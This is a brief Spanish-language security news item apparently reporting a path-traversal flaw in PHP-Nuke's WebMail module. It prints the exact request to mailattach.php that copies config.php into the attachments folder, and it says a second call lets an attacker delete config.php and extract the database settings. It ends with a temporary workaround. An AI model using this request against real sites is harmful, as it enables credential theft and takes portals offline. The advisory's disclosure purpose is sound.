Vulnerabilidad en PHP-Nuke
La ejecución en navegador de la URL:
/modules/WebMail/mailattach.php?userfile=../../config.php
&userfile_name=../attachments/file.txt&attachments=1
seguido de otra llamada a URL, permite al atacante, tirar el portal por borrado del config.php y extraer los datos de configuración de la base de datos. Como solución temporal, proponen tirar el webmail, renombrando mailattach.php y borrando en attachments el file.txt, lo antes posible.
Enlaces relacionados:
http://www.phpnuke-hispano.com/modules.php?name=News&file=article&sid=363
http://www.phpnuke.org
COMPARTE ESTA NOTICIA
COMPARTIR EN FACEBOOK
COMPARTIR EN TWITTER
COMPARTIR EN LINKEDIN
COMPARTIR EN WHATSAPP